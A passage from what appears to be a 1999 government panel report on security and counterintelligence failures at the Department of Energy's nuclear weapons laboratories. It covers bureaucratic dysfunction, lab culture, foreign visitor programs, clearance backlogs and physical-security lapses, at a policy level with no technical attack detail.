done to U.S. security interests is, at the least, currently unknown; at worst, it may be unknowable. Numerous variables are inescapable. Analysis of indigenous
technology development in foreign research laboratories is fraught with uncertainty. Moreover, a nation that is a recipient of classified information is not always the
sponsor of the espionage by which it was obtained. However, the panel does concur, on balance, with the findings of the recent DCI–sponsored damage
assessment. We also concur with the findings of the subsequent independent review, led by retired Admiral David Jeremiah, of that damage assessment.
The Department of Energy is a dysfunctional bureaucracy that has proven it is incapable of reforming itself. Accountability at DOE has been spread so
thinly and erratically that it is now almost impossible to find. The long traditional and effective method of entrenched DOE and lab bureaucrats is to defeat security
reform initiatives by waiting them out. They have been helped in this regard by the frequent changes in leadership at the highest levels of DOE—nine Secretaries of
Energy in 22 years. Eventually, the reform–minded management transitions out, either due to a change in administrations or as a result of the traditional “revolving
door” management practices at DOE. Then the bureaucracy reverts to old priorities and predilections. Such was the case in December 1990 with the reform
recommendations carefully crafted by a special task force commissioned by then–Energy Secretary Watkins. The report skewered DOE for unacceptable
“direction, coordination, conduct, and oversight” of safeguards and security. Two years later, the new administration rolled in, redefined priorities, and the initiatives
all but evaporated. Deputy Secretary Charles Curtis in late 1996 investigated clear indications of serious security and CI problems and drew up a list of initiatives in
response. Those initiatives also were dropped after he left office.
Reorganization is clearly warranted to resolve the many specific problems with security and counterintelligence in the weapons laboratories, but
also to address the lack of accountability that has become endemic throughout the entire Department. Layer upon layer of bureaucracy, accumulated
over the years, has diffused responsibility to the point where scores claim it, no one has enough to make a difference, and all fight for more. Convoluted, confusing,
and often contradictory reporting channels make the relationship between DOE headquarters and the labs, in particular, tense, internecine, and chaotic. In between
the headquarters and the laboratories are field offices, which the panel found to be a locus of much confusion. In background briefings of the panel, senior DOE
officials often described them as redundant operations that function as a shadow headquarters, often using their political clout and large payrolls to push their own
agendas and budget priorities in Congress. Even with the latest DOE restructuring, the weapons labs are reporting to far too many DOE masters.
The criteria for the selection of Energy Secretaries have been inconsistent in the past. Regardless of the outcome of ongoing or contemplated
reforms, the minimum qualifications for an Energy Secretary should include experience in not only energy and scientific issues, but national
security and intelligence issues as well. The list of former Secretaries, Deputy Secretaries, and Under Secretaries meeting all of these criteria is very short.
Despite having a large proportion of its budget (roughly 30 percent) devoted to functions related to nuclear weapons, the Department of Energy has often been led
by men and women with little expertise and background in national security. The result has been predictable: security issues have been a low priority, and leaders
unfamiliar with these issues have delegated decisionmaking to lesser–ranking officials who lacked the incentives and authority to address problems with dispatch and
forcefulness. For a Department in desperate need of strong leadership on security issues, this has been a disastrous trend. The bar for future nominees at the upper
levels of the Department needs to be raised significantly.
DOE cannot be fixed with a single legislative act: management must follow mandate. The research functions of the labs are vital to the nation’s
long term interest, and instituting effective gates between weapons and nonweapons research functions will require both disinterested scientific
expertise, judicious decisionmaking, and considerable political finesse. Thus both Congress and the executive branch—whether along the lines suggested by
the Special Investigative Panel or others—should be prepared to monitor the progress of the Department’s reforms for years to come. This panel has no illusions
about the future of security and counterintelligence at DOE. There is little reason to believe future DOE Secretaries will necessarily share the resolve of Secretary
Richardson, or even his interest. When the next Secretary of Energy is sworn in, perhaps in the spring of 2001, the DOE and lab bureaucracies will still have
advantages that could give them the upper hand: time and proven skills at artful dodging and passive intransigence.
The Foreign Visitors’ and Assignments Program has been and should continue to be a valuable contribution to the scientific and technological
progress of the nation. Foreign nationals working under the auspices of U.S. weapons labs have achieved remarkable scientific advances and contributed
immensely to a wide array of America’s national security interests, including nonproliferation. Some have made contributions so unique that they are all but
irreplaceable. The value of these contacts to the nation should not be lost amid the attempt to address deep, well–founded concerns about security lapses. That said,
DOE clearly requires measures to ensure that legitimate use of the research laboratories for scientific collaboration is not an open door to foreign espionage agents.
Losing national security secrets should never be accepted as an inevitable cost of obtaining scientific knowledge.
In commenting on security issues at DOE, we believe that both Congressional and Executive Branch leaders have resorted to simplification and
hyperbole in the past few months. The panel found neither the dramatic damage assessments nor the categorical reassurances of the Department’s
advocates to be wholly substantiated. We concur with and encourage many of Secretary Richardson’s recent initiatives to address the security problems at the
Department, and we are heartened by his aggressive approach and command of the issues. He has recognized the organizational dysfunction and cultural vagaries at
DOE and taken strong, positive steps to try to reverse the legacy of more than 20 years of security mismanagement. However, the Board is extremely skeptical that
any reform effort, no matter how well–intentioned, well–designed, and effectively applied, will gain more than a toehold at DOE, given its labyrinthine management
structure, fractious and arrogant culture, and the fast–approaching reality of another transition in DOE leadership. Thus we believe that he has overstated the case
when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are, today, safe and secure.”
Similarly, the evidence indicating widespread security vulnerabilities at the weapons laboratories has been ignored for far too long, and the work of the Cox
Committee and intelligence officials at the Department has been invaluable in gaining the attention of the American public and in helping focus the political will
necessary to resolve these problems. Nonetheless, there have been many attempts to take the valuable coin of damaging new information and decrease its value by
manufacturing its counterfeit, innuendo; possible damage has been minted as probable disaster; workaday delay and bureaucratic confusion have been cast as
diabolical conspiracies. Enough is enough.
Fundamental change in DOE’s institutional culture—including the ingrained attitudes toward security among personnel of the weapons
laboratories—will be just as important as organizational redesign. Never have the members of the Special Investigative Panel witnessed a bureaucratic
culture so thoroughly saturated with cynicism and disregard for authority. Never before has this panel found such a cavalier attitude toward one of the most serious
responsibilities in the federal government—control of the design information relating to nuclear weapons. Particularly egregious have been the failures to enforce
cyber–security measures to protect and control important nuclear weapons design information. Never before has the panel found an agency with the bureaucratic
insolence to dispute, delay, and resist implementation of a Presidential directive on security, as DOE’s bureaucracy tried to do to the Presidential Decision Directive
No. 61 in February 1998.
The best nuclear weapons expertise in the U.S. government resides at the national weapons labs, and this asset should be better used by the
intelligence community. For years, the PFIAB has been keen on honing the intelligence community’s analytic effectiveness on a wide array of nonproliferation
areas, including nuclear weapons. We believe that the DOE Office of Intelligence, particularly its analytic component, has historically been an impediment to this goal
because of its ineffective attempts to manage the labs’ analysis. The office’s mission and size (about 70 people) is totally out of step with the Department’s
intelligence needs. A streamlined intelligence liaison body, much like Department of Treasury’s Office of Intelligence Support—which numbers about 20 people,
including a 24–hour watch team—would be far more appropriate. It should concentrate on making the intelligence community, which has the preponderance of
overall analytic experience, more effective in fulfilling the DOE’s analysis and collection requirements.
ROOT CAUSES
The sources of DOE’s difficulties in both overseeing scientific research and maintaining security are numerous and deep. The Special Investigative Panel primarily
focused its inquiry on the areas within DOE where the tension between science and security is most critical: the nuclear weapons laboratories.1 To a lesser extent, the
panel examined security issues in other areas of DOE and broad organizational issues that have had a bearing on the functioning of the laboratories.
Inherent in the work of the weapons laboratories, of course, is the basic tension between scientific inquiry, which thrives on freewheeling searches for and wide
dissemination of information, and governmental secrecy, which requires just the opposite. But the historical context in which the labs were created and thrived has
also figured into their subsequent problems with security.
AN INTERNATIONAL ENTERPRISE
U.S. research laboratories have always had a tradition of drawing on immigrant talent. Perhaps the first foreign–born contributor to our nation’s nuclear program was
Albert Einstein. In his letter to President Roosevelt on August 2, 1939, Einstein advised the President of the possibility of the atomic bomb and the urgent need for
government action. By 1943, the ranks of the Manhattan project at Los Alamos, New Mexico were filled with scientists and engineers from Italy (Fermi), Germany
(Bethe), Poland (Ulam), Hungary (Wigner, Szilard, Von Neumann, and Teller), Russia (Kistiakovsy) and Austria (Rabi). Indeed, it is possible that the atomic bomb
would never have been completed but for immigrant talent, and the diversity of talent applied to the project was hailed at the time as a model of international
cooperation. Eleanor Roosevelt, in a 1945 radio address, declared that the development of the atomic bomb by “many minds belonging to different races and
different religions sets the pattern for the way in which in the future we may be able to work out our difficulties.”2
The role of and reliance on immigrant talent in the United States—particularly at the graduate school and doctoral levels where much of the nation’s research is
performed—has increased over the years. From 1975 to 1992, the aging of America’s baby boomers resulted in a decline in the overall size of the college–age
population and, unlike other industrialized nations, the U.S. saw a decline in the number of American students receiving science and engineering degrees.3
From the 1950s until 1995, the number of non–U.S. citizens who earned doctorates in scientific and engineering fields from American universities steadily climbed,
reaching 27 percent by 1985 and 40 percent by 1995. Two–thirds of those receiving those doctorates in 1995 held temporary residency visas, and Chinese
doctoral recipients outnumbered recipients from all other regions combined.4
But the willingness to draw on foreign talent also has meant a greater risk of falling prey to those with foreign allegiances. One of the earliest and most infamous
espionage scandals at the nation’s nuclear laboratories was centered on the physicist Klaus Fuchs, a German native and naturalized British citizen who spied on
researchers at Los Alamos for the Soviet Union. More recent instances of actual and alleged foreign espionage at the nuclear weapons laboratories are detailed in
the Classified Appendix to this report.
As growth of the U.S. talent pool in science and engineering stagnated, and the amount of available talent abroad grew rapidly, the U.S. has had to rely on more
foreign–born talent in national scientific research and development programs in order to maintain the best research facilities in the world. At the same time, since the
end of the Cold War, DOE has entered into more extensive cooperative programs with foreign nations in efforts to reduce the threats of proliferation and diversion
of nuclear weapons material. By June 1990, DOE had entered into 157 bilateral research and development agreements for scientific exchange purposes. Among
others, parties to the agreements were the Soviet Union, the People’s Republic of China, Soviet bloc nations and countries that posed nuclear proliferation threats.5
In December 1990, a report to the DOE Secretary noted “a high probability of greatly increasing numbers of foreign visits and assignments to DOE facilities in future
years.”6 The widening of foreign contacts concurrent with a greater influx of foreign–born talent has raised concerns about security compromises by scientists with
foreign allegiances and highlighted the need for special care in implementing formal clearance procedures for involvement in classified work.
BIG, BYZANTINE, AND BEWILDERING BUREAUCRACY
DOE is not one of the federal government’s largest agencies in absolute terms, but its organizational structure is widely regarded as one of the most confusing. That is
another legacy of its origins, and it has made the creation, implementation, coordination, and enforcement of consistent policies very difficult over the years.
The effort to develop the atomic bomb was managed through an unlikely collaboration of the Manhattan Engineering District of the U.S. Army Corps of Engineers
(hence the name, “the Manhattan Project”) and the University of California—two vastly dissimilar organizations in both culture and mission. The current form of the
Department took shape in the first year of the Carter Administration through the merging of more than 40 different government agencies and organizations, an event
from which it has arguably never recovered.
The newly created DOE subsumed the Federal Energy Administration, the Energy Research and Development Administration (ERDA), the Federal Power
Commission, and components and programs of several other government agencies. Included were the nuclear weapons research laboratories that were part of the
ERDA and, formerly, of the Atomic Energy Commission.
Many of these agencies and organizations have continued to operate under the DOE umbrella with the same organizational structure that they had prior to joining the
Department.
Even before the new Department was created, concerns were raised about how high the nuclear weapons–related operations would rank among the competing
priorities of such a large bureaucracy. A study of the issue completed in the last year of the Ford Administration considered three alternatives: shifting the weapons
operations to the Department of Defense, creating a new freestanding agency, or keeping the program within ERDA—the options still being discussed more than 20
years later. As one critic of the DOE plan told The Washington Post, “Under the AEC, weapons was half the program. Under ERDA, it was one–sixth. Under
DOE, it will be one–tenth. It isn’t getting the attention it deserves.” Although the proportions cited by that critic would prove to be inaccurate, he accurately spotted
the direction of the trend.
_____________________________________
The DOE Management Challenge
MISSION
· Lead agency for development of national
energy resources and technologies.
· Responsible for the largest environmental
cleanup effort in history.
· Nuclear energy and weapons research and
development.
· Management of special nuclear materials
stockpiles.
· Protection of highly sensitive classified and
proprietary information against foreign and
corporate espionage.
SIZE
· If included among the Nation’s Fortune 500
firms, would rank in the top 50.
· The fourth largest landowner in the United
States.
· Budget of roughly $18 billion comprises close to
3 percent of total discretionary spending at the
federal level.
· Employs more than 11,000 Federal employees
and more than 100,000 contract employees.
· Owns and manages more than 50 major
installations spread across 2.4 million acres and
35 states.
COMPLEXITY
· A diverse workforce of military and civilian per-sonnel;
U.S. citizens and foreign nationals;
career federal officials and part-time
researchers; white collar bureaucrats as well as
scientists and engineers specializing in narrow
esoteric fields.
· Constituencies include the White House,
Congress, the power industry, multinational
defense and aerospace corporations, major
universities, states and municipalities seeking or
monitoring environmental cleanups.
During 1978, its first year of operation within the new structure, DOE already had in place more than 9,500 prime contracts and more than 1,800 financial assistance
awards, which together were spread among 188 universities and more than 3,200 contractors. And the Department was growing: from 1977 to 1978, grants and
contracts with university researchers posted an increase of 22 percent.7
LACK OF ACCOUNTABILITY
Depending on the issue at hand, a line worker in a DOE facility might be responsible to DOE headquarters in Washington, a manager in a field office in another state,
a private contractor assigned to a DOE project, a research team leader from academia, or a lab director on another floor of the worker’s building. For example,
prior to Secretary Richardson’s restructuring initiative earlier this year, a single laboratory, Sandia, was managed or accountable to nine different DOE security
organizations.
Last year, after years of reports highlighting the problem of confused lines of authority, DOE was still unable to ensure the effectiveness of security measures because
of its inability to hold personnel accountable. A 1998 report lamented that “short of wholesale contract termination, there did not appear to be adequate
penalty/reward systems to ensure effective day–to–day security oversight at the contractor level.”8
The problem is not only the diffuse nature of authority and accountability in the Department. It is the dynamic and often informal character of the authority that does
exist. The inherently unpredictable outcomes of major experiments, the fluid missions of research teams, the mobility of individual researchers, the internal
competition among laboratories, the ebb and flow of the academic community, the setting and onset of project deadlines, the cyclical nature of the federal budgeting
process, and the shifting imperatives of energy and security policies dictated from the White House and Congress—all of these dynamic variables contribute to
volatility in the Department’s workforce and an inability to give the weapons–related functions the priority they deserved. Newcomers, as a result, have an
exceedingly hard time when they are assimilated; incumbents have a hard time in trying to administer consistent policies; and outsiders have a hard time divining
departmental performance and which leaders and factions are credible. Such problems are not new to government organizations, but DOE’s accountability vacuum
has only exacerbated them.
Management and security problems have recurred so frequently that they have resulted in nonstop reform initiatives, external reviews, and changes in policy
direction. As one observer noted in Science magazine in 1994: “Every administration sets up a panel to review the national labs. The problem is that nothing is done.”
The constant managerial turnover over the years has generated nearly continuous structural reorganizations and repeated security policy reversals. Over the last
dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. During that time, security and counterintelligence
responsibilities have been “punted” from one office to the next.
CULTURE AND ATTITUDES
In the course of this inquiry, many officials interviewed by the PFIAB panel cited the scientific culture of the weapons laboratories as a factor that complicates,
perhaps even undermines, the ability of the Department to consistently implement its security procedures. Although there seemed to be no universally accepted
definition of the culture, nearly everyone agreed that it is distinct and pervasive.
One facet of the culture mentioned more than others is an arrogance borne of the simple fact that nuclear researchers specialize in one of the world’s most advanced,
challenging, and esoteric fields of knowledge. Nuclear physicists, by definition, are required to think in literally other dimensions not accessible to laymen. Thus it is
not surprising that they might bridle under the restraints and regulations of administrators and bureaucrats who do not entirely comprehend the precise nature of the
operation being managed.
Operating within a large, complex bureaucracy with transient leaders would only tend to accentuate a scientist’s sense of intellectual superiority: if administrators have
little more than a vague sense of the contours of a research project, they are likely to have little basis to know which rules and regulations constitute unreasonable
burdens on the researchers’ activities.
With respect to at least some security issues, the potential for conflicts over priorities is obvious. For example, how are security officials to weigh the risks of
unauthorized disclosures during international exchanges if they have only a general familiarity with the cryptic jargon used by the scientists who might participate?
The prevailing culture of the weapons labs is widely perceived as contributing to security and counterintelligence problems. At the very least, restoring public
confidence in the ability of the labs to protect nuclear secrets will require a thorough reappraisal of the culture within them.
CHANGING TIMES, CHANGING MISSIONS
The external pressures placed on the Department of Energy in general, and the weapons labs in particular, are also worth noting. For more than 50 years, America’s
nuclear researchers have operated in a maelstrom of shifting and often contradictory attitudes. In the immediate aftermath of World War II, nuclear discoveries were
simultaneously hailed as a destructive scourge and a panacea for a wide array of mankind’s problems. The production of nuclear arms was regarded during the
1950s and 1960s as one of the best indices of international power and the strength of the nation’s military deterrent.
During the 1970s, the nation’s leadership turned to nuclear researchers for solutions to the energy crisis at the same time that the general public was becoming more
alarmed about the nuclear buildup and the environmental implications of nuclear facilities.
Over the past 20 years, some in Congress have repeatedly called for the dissolution of the Department of Energy, which has undoubtedly been a distraction to those
trying to make long–term decisions affecting the scope and direction of the research at the labs. And in the aftermath of the Cold War, the Congress has looked to
the nation’s nuclear weapons labs to help in stabilizing or dismantling nuclear stockpiles in other nations.
Each time that the nation’s leadership has made a major change in the Department’s priorities or added another mission, it has placed additional pressure on a
government agency already struggling to preserve and expand one of its most challenging historical roles: guarantor of the safety, security, and reliability of the
nation’s nuclear weapons.
RECURRING VULNERABILITIES
Over the past 20 years, six DOE security issues have received the most scrutiny and criticism from both internal and external reviewers: long–term security planning
and policy implementation; physical security over facilities and property; screening and monitoring of personnel; protection of classified and sensitive information,
particularly information that is stored electronically in the Department’s computers; accounting for nuclear materials; and the foreign visitors’ programs.
MANAGEMENT AND PLANNING
Management of security and counterintelligence has suffered from chronic problems since the creation of the Department of Energy in 1977.
During the past decade, the mismatch between DOE’s security programs and the severity of the threats faced by the Department grew more pronounced. While the
number of nations possessing, developing, or seeking weapons of mass destruction continued to rise, America’s reliance on foreign scientists and engineers
dramatically increased, and warnings mounted about the espionage goals of other nations, DOE spending on safe-guards and security decreased by roughly
one–third.1
The widening gap between the level of security and the severity of the threat resulted in cases where sensitive nuclear weapons information was certainly lost to
espionage. In countless other instances, such information was left vulnerable to theft or duplication for long periods, and the extent to which these serious lapses may
have damaged American security is incalculable. DOE’s failure to respond to warnings from its own analysts, much less independent sources, underscores the depth
of its managerial weakness and inability to implement legitimate policies regarding well–founded threats.
_________________________________________
A Sample of Security Issues
MANAGEMENT AND PLANNING
Decentralized decisionmaking undermines
consistency of policies.
Lack of control for security budget has allowed
diversion of funds to other priorities.
Department leaders with little experience in
security and intelligence.
Lack of accountability.
PHYSICAL SECURITY
Training insufficient for some security personnel.
Nuclear materials stored in aging buildings not
designed for containment purposes.
Recurring problems involving lost or stolen
property.
Poor management results in unnecessary training
and purchasing costs.
PERSONNEL SECURITY CLEARANCES
Extended lags in obtaining clearances, reinvestigating
backgrounds, and terminating clearance
privileges for former employees.
Some contractors not adequately investigated
or subject to drug & substance abuse policies.
Lack of uniform procedures and accurate data.
Inadequate pre–employment screening.
More clearances granted than necessary.
PROTECTION OF CLASSIFIED INFORMATION
Poor labeling and tracking of computer media
containing classified information.
Problems with lax enforcement of password
policies.
Network, email, and Internet connections make
transfer of large amounts of data easier.
ACCOUNTING FOR NUCLEAR MATERIALS
Chronic problems in devising and operating an
accurate accounting system of tracking stocks
and flows of nuclear materials.
FOREIGN VISITORS
Weak systems for tracking visits and screening
backgrounds of visiting scientists.
Decentralization makes monitoring of discussions
on sensitive topics difficult.
During the mid–1980s, the predominant concern of DOE officials was improving the physical security of the nuclear weapons laboratories and plants. Following a
January 1983 report2 that outlined vulnerabilities of the weapons labs to terrorism, the Department embarked on a five–year program of construction and purchases
that would see its overall safeguards and security budget roughly double and its spending on upgrades nearly triple. Included was money for additional guards,
security training, helicopters, fortified guard towers, vehicle barriers, emergency planning, and advanced alarm systems.3
Improving physical security in a wide array of nuclear weapons facilities whose replacement value was an estimated $100 billion4 , proved to be difficult. Reports
through the late 1980s and early 1990s continued to highlight deficiencies in the management of physical security. In the late 1980s, priorities began to shift
somewhat. Listening devices were discovered in weapons–related facilities,5 and a 1990 study advised the Department leadership of an intensifying threat from
foreign espionage. Less and less able to rely on the former Soviet Union to supply technology and resources, an increasing number of states embarked on campaigns
to bridge the economic and technological gap with the United States by developing indigenous capabilities in high technology areas. The study noted that the freer
movement of goods, services and information in a less hostile world “intensified the prospects and opportunities for espionage as missing pieces of critically needed
information became more easily identified.”6
An intelligence report further highlighted the changing foreign threat to the labs by noting that “new threats are emerging from nontraditional adversaries who target
issues key to U.S. national security. DOE facilities and personnel remain priority targets for hostile intelligence collection.”7 Anecdotal evidence corroborates, and
intelligence assessments agree, that foreign powers stepped up targeting of DOE during the early 1990s. (See Classified Appendix) While this threat may have been
taken seriously at the highest levels of the DOE, it was not uniform throughout the Department.
A former FBI senior official noted in discussions with the PFIAB investigative panel that DOE lab scientists during these years appeared naive about the level of
sophistication of the nontraditional threat posed by Chinese intelligence collection. The trend in openness to foreign visitors and visits does not indicate any sense of
heightened wariness. A 1997 GAO report concluded that from mid–1988 to the mid–1990s, the number of foreign visitors to key weapons labs increased from
3,800 to 5,900 annually and sensitive country visitors increased from 500 to more than 1,600.8 Meanwhile, the DOE budget for counterintelligence was in
near–constant decline.
How Long Does It Take?
Each year DOE security officials compile audits to identify security lapses and vulnerabilities in the facilities and procedures of the nuclear weapons laboratories
and plants. The following year, they report on whether the problems have been addressed. Given the sensitivity of what was being protected—information
about how to build, miniaturize, store, and maximize the destructiveness of nuclear weapons—the numbers logged in the audits are remarkable:
11
No. of months a DOE employee was dead before Department officials realized four documents with CLASSIFIED and RESTRICTED DATA were
still assigned to him.
20
No. of months before DOE officials could ensure that improperly stored classified computer media had been properly safeguarded.
24
No. of months it took to order security labels (SECRET, TOP SECRET, etc.) for mislabeled software.
31
No. of months that 2,750 out of 3,000 non-classified computer terminals were connected and being used on a classified network.
31
No. of months to write and approve a network security plan.
35
No. of months it took DOE officials to write a work order to replace a lock at a weapons lab facility containing sensitive nuclear information.
45
No. of months taken to correct a broken doorknob that was sticking in an open position and allowing access to sensitive areas.
51
No. of months to correct mistake that allowed secure telephone cryptographic materials to go improperly safeguarded.
?
No. of months before security audit team discovered that the main telephone frame room door at a weapons lab had been forced open and the lock
destroyed.
SOURCE: DEPT. OF ENERGY
As noted in the previous chapter, federal officials in charge of oversight of nuclear weapons laboratories have historically allowed decisionmaking on basic aspects of
security to be decentralized and diffuse. With their budget spread piecemeal throughout a number of offices, security and counterintelligence officials often found
themselves with a weak voice in internal bureaucratic battles and an inability to muster the authority to accomplish its goals. Indeed, an excerpt from a history of the
early years of the Atomic Energy Commission, reads much like recent studies:
Admiral Gingrich, who had just resigned as director of security [in 1949], had expressed to the Joint Committee [on Atomic Energy] a lack of
confidence in the Commission’s security program. Gingrich complained that decentralization of administrative functions to the field offices had left him
with little more than a staff function at headquarters; even there, he said, he did not control all the activities that seemed properly to belong to the
director of security.9
More than 30 years later, decentralization still posed a problem for security managers. An internal DOE report in 1990 found that the Department lacked a
comprehensive approach to management of threats and dissemination of information about them.10 A DOE annual report in 1992 found that security “has suffered
from a lack of management focus and inconsistent procedural execution throughout the DOE complex. The result is that personnel are seldom held responsible for
their disregard, either intentional or unintentional, of security requirements.”11
The counterintelligence effort at DOE in the late 1980s and mid–1990s was in its infancy and grossly underfunded. Although the Department could have filled its gap
in some areas, such as counterintelligence information, through cooperation with the broader intelligence community, PFIAB research and interviews indicate that
DOE headquarters’ relationship with the FBI—the United States’ primary domestic CI organization—was strained at best.
DOE requested an FBI agent detailee in 1988 to assist in developing a CI program, but the agent found that DOE failed to provide management support or access
to senior DOE decisionmakers. A formal relationship with the FBI was apparently not established until 1992: a Memorandum of Understanding between the FBI
and DOE on respective responsibilities concerning the coordination and conduct of CI activities in the United States. However, in 1994 two FBI detailees assigned
to DOE complained about their limited access and were pulled back to FBI because of a “lack of control of the CI program by DOE headquarters which resulted in
futile attempts to better manage the issue of foreign visitors at the laboratories.”12
________________________________
We asked a number of DOE officials to
whom they report, to whom they were
responsible. Invariably, their answer
was: “It depends.”
The haphazard assortment of agencies and missions folded into DOE has become so confusing as to become a running joke within the institution. In the course of the
panel’s research and interviews, rare were the senior officials who expressed any sort of confidence in their understanding of the extent of the agency’s operations,
facilities, or procedures. Time and again, PFIAB panel members posed the elementary questions to senior DOE officials. To whom do you report? To whom are
you accountable? The answer, invariably, was: “It depends.”
DOE’s relationship with the broader intelligence community was not well–defined until the mid–1990s. Coordination between DOE CI elements and the broader
intelligence community, according to a 1992 intelligence report, was hampered from the 1980s through the early 1990s by DOE managers’ inadequate
understanding of the intelligence community.13 The Department did not become a core member of the National Counterintelligence Policy Board (established in
1994 under PDD-24) until 1997.
Over much of the past decade, rather than a heightened sensitivity to espionage threats recognized widely throughout the intelligence community, DOE lab officials
have operated in an environment that allowed them to be sanguine, if not skeptical. Numerous DOE officials interviewed by the PFIAB panel stated that they
believed that the threat perception was weakened further during the administration of Secretary O’Leary, who advanced the labs openness policies and downgraded
security as an issue by terminating some security programs instituted by her predecessor.
Even when the CI budget was expanded in the late–1990s, the expenditures fell short of the projected increases. In Fiscal Year 1997, for example, DOE’s CI
budget was $3.7 million but the actual expenditures on CI were only two–thirds of that level, $2.3 million. Shortly before the 1997 GAO and FBI reports on DOE’s
counterintelligence posture were issued, DOE began instituting changes to beef up its counterintelligence and foreign intelligence analytic capabilities.14
When DOE did devote its considerable resources to security, it too often faltered in implementation. A report to the Secretary in January 1994 noted “growing
confusion within the Department with respect to Headquarters’ guidance for safeguards and security. At this time, there is no single office at Headquarters
responsible for the safeguards and security program. Most recently, a number of program offices have substantially expanded their safeguards and security staff to
office–size organizations. These multiple safeguards and security offices have resulted in duplication of guidance, unnecessary requests for information and
clarification, and inefficient program execution. Unchecked, this counterproductive tendency threatens the success of the overall safeguards and security effort.”15
A 1996 DOE Inspector General report found that security personnel at the weapons programs had purchased and stockpiled far more firepower—ranging from
handguns and rifles to submachine guns and grenade launchers—than could ever be used in an actual emergency. The Oak Ridge facilities had more than three
weapons per armed security officer—on and off duty. Los Alamos National Laboratory had more than four.16
____________________________________
Foreign agents could probably not
shoot their way into U.S. weapons laboratories.
But they could apply for an
access pass to walk in and strike up a
conversation.
Around the same time, GAO security audits of the research laboratories at these sites found lax procedures for issuing access passes to secure areas, inadequate
prescreening of the more than 1,500 visitors from sensitive countries that visited the weapons laboratories annually, and poor tracking of the content of discussions
with foreign visitors. The implication: foreign agents could probably not shoot their way past the concertina wires and bolted doors to seize secrets from U.S.
weapons laboratories, but they would not need to do so. They could probably apply for an access pass, walk in the front door, and strike up a conversation.
PHYSICAL SECURITY
The physical security of the Department of Energy’s weapons–related programs is roughly divided into two essential functions: tracking and control over the property
and equipment within the weapons-related laboratories, and keeping unwarranted intruders out, often referred to as the realm of “guns, guards, and gates.”
The general approach to security, of course, was defined by the emphasis on secrecy associated with nuclear weapons program during World War II. Los Alamos
National Laboratory was created as a “closed city”—a community with a high degree of self-sufficiency, clearly defined and protected boundaries, and a minimum of
ingress from and egress to the outer world. Although the community is no longer “closed,” the weapons laboratories at Los Alamos, like those at the other national
laboratories, still retain formidable physical protections and barriers. In examining the history of the laboratories, the panel found only a few instances where an
outsider could successfully penetrate the grounds of an operation by destruction of a physical safeguard or direct violent assault.
__________________________________
Clearances to secure DOE areas have
been granted simply for convenience,
such as to reduce the length of an
employee’s walk from the car to the
office each morning.
In visits to several of the weapons laboratories, the members of the Special Investigative Panel were impressed by the great amount of attention and investment
devoted to perimeter control, weaponry, and security of building entrances and exits. Indeed, one cannot help but be struck by the forbidding and formidable
garrison–type atmosphere that is prevalent at many of the facilities: barbed wire, chain–link fences, electronic sensors, and surveillance cameras. Further, the panel
recognizes that the labs themselves have developed and produced some of the most sophisticated technical security devices in the world. Nonetheless, DOE reports
and external reviews since at least 1984 have continued to raise concerns about aging security systems.17
Management of the secure environments at the laboratories has posed more serious problems. As noted earlier, DOE may be spending too much money in some
areas, buying more weapons than could conceivably be used in an emergency situation. In other cases, it may be spending too little. Budget cuts in the early and
mid-1990s led to 40 to 50 percent declines in officer strength and over-reliance on local law enforcement. Resources became so low that normal protective force
operations required “the use of overtime scheduling to accomplish routine site protection.”18 GAO has found an assortment of problems at Los Alamos over the past
decade: security personnel failed basic tests in such tasks as firing weapons, using a baton, or handcuffing a suspect, and inaccurate and incomplete records were
kept on security training.19 Other DOE facilities have had substantial problems in man-agement of physical property.
In 1990, Lawrence Livermore Laboratory could not account for 16 percent of its inventory of government equipment, acquired at a cost $18.6
million.20
In 1993, DOE sold 57 components of nuclear reprocessing equipment and associated documents, including blueprints, to an Idaho salvage dealer.
Much of what was sold was subsequently found to be potentially useful to any nation attempting to develop or advance its own reprocessing
operation.21
Following a GAO report in 1994, which found that the Rocky Flats facility was unable to account for large pieces of equipment such as forklifts and a
semitrailer, some $21 million in inventory was written off.22
DOE had begun to consolidate its growing stockpile of sensitive nuclear material by 1992, but a 1997 DOE report to the Secretary found that significant quantities
of the material “remain in aging buildings and structures, ranging in age from 12 to 50 years, that were never intended for use as storage facilities for extended
periods.”23
SCREENING AND MONITORING OF PERSONNEL
Insider threats to security have been a chronic problem at the nation’s weapons laboratories. From the earliest years, the importance of the labs’ missions and their
decentralized structure have had an uneasy coexistence with the need for thorough background investigations of researchers and personnel needing access to
sensitive areas and information.
In 1947, the incoming director of security for the AEC was greeted with a backlog of more than 13,000 background investigations and a process where clearances
had been dispersed to field offices that operated with few formal guidelines.24
Forty years later, GAO found that the backlog of personnel security investigations had increased more than nine-fold, to more than 120,000. Moreover, many
clearances recorded as valid in the Department’s records should have been terminated years before.25
____________________________________
Even after DOE discovered listening
devices in some of its weapons
laboratories, security audits found that
thousands of “Q” clearances were being
given to inappropriate personnel.26
The research of the PFIAB panel found that problems with personnel security clearances, while mitigated in some aspects, have persisted to an alarming degree.
From the mid–1980s through the mid–1990s, the DOE Inspector General repeatedly warned Department officials that personnel were receiving clearances that
were much higher than warranted and that out-dated clearances were not being withdrawn on a timely basis. The issue became more urgent with the discovery of a
clandestine surveillance device at a nuclear facility.27
But problems persisted. DOE Inspector General reports in 1990 and 1991 found that one of the weapons laboratories had granted “Q” clearances (which provide
access to U.S. government nuclear weapons data) to more than 2,000 employees who did not need access to classified information.28 A 1992 report to the
Secretary of Energy noted that “DOE grants clearances requested by its three major defense program sponsored labs based on lab policies to clear all employees
regardless of whether actual access to classified interests is required for job performance.”29
Three years later, a review of personnel security informed the Secretary there were “individuals who held security clearances for convenience only and limited
security clearances to those individuals requiring direct access to classified matter or [special nuclear materials] to perform official duties.”30
More recent evidence is no more reassuring. A counterintelligence investigation at a nuclear facility discovered that the subject of an inquiry had been granted a “Q”
clearance simply to avoid the delay caused by the normal processing of a visit.31 That same year, an illegal telephone wiretap was discovered at the same lab. The
employee who installed it confessed, but was not prosecuted by the government.32
PROTECTION OF CLASSIFIED AND SENSITIVE INFORMATION
Two vulnerabilities regarding classified and sensitive information at DOE have recurred repeatedly throughout the past 20 years: inappropriate release of classified
information, either directly through inadvertence or indirectly through improper declassification; and the increasing mobility of classified and sensitive information
through electronic media, such as computers.
As computers have progressed from the large mainframes of the 1950s and 1960s to desktop models in the 1980s and decentralized networks in the 1990s, it has
become progressively easier for individuals to retrieve and transport large amounts of data from one location to another. This has presented an obvious problem for
secure environments. GAO found in 1991 that DOE inspections revealed more than 220 security weaknesses in computer systems across 16 facilities. Examples
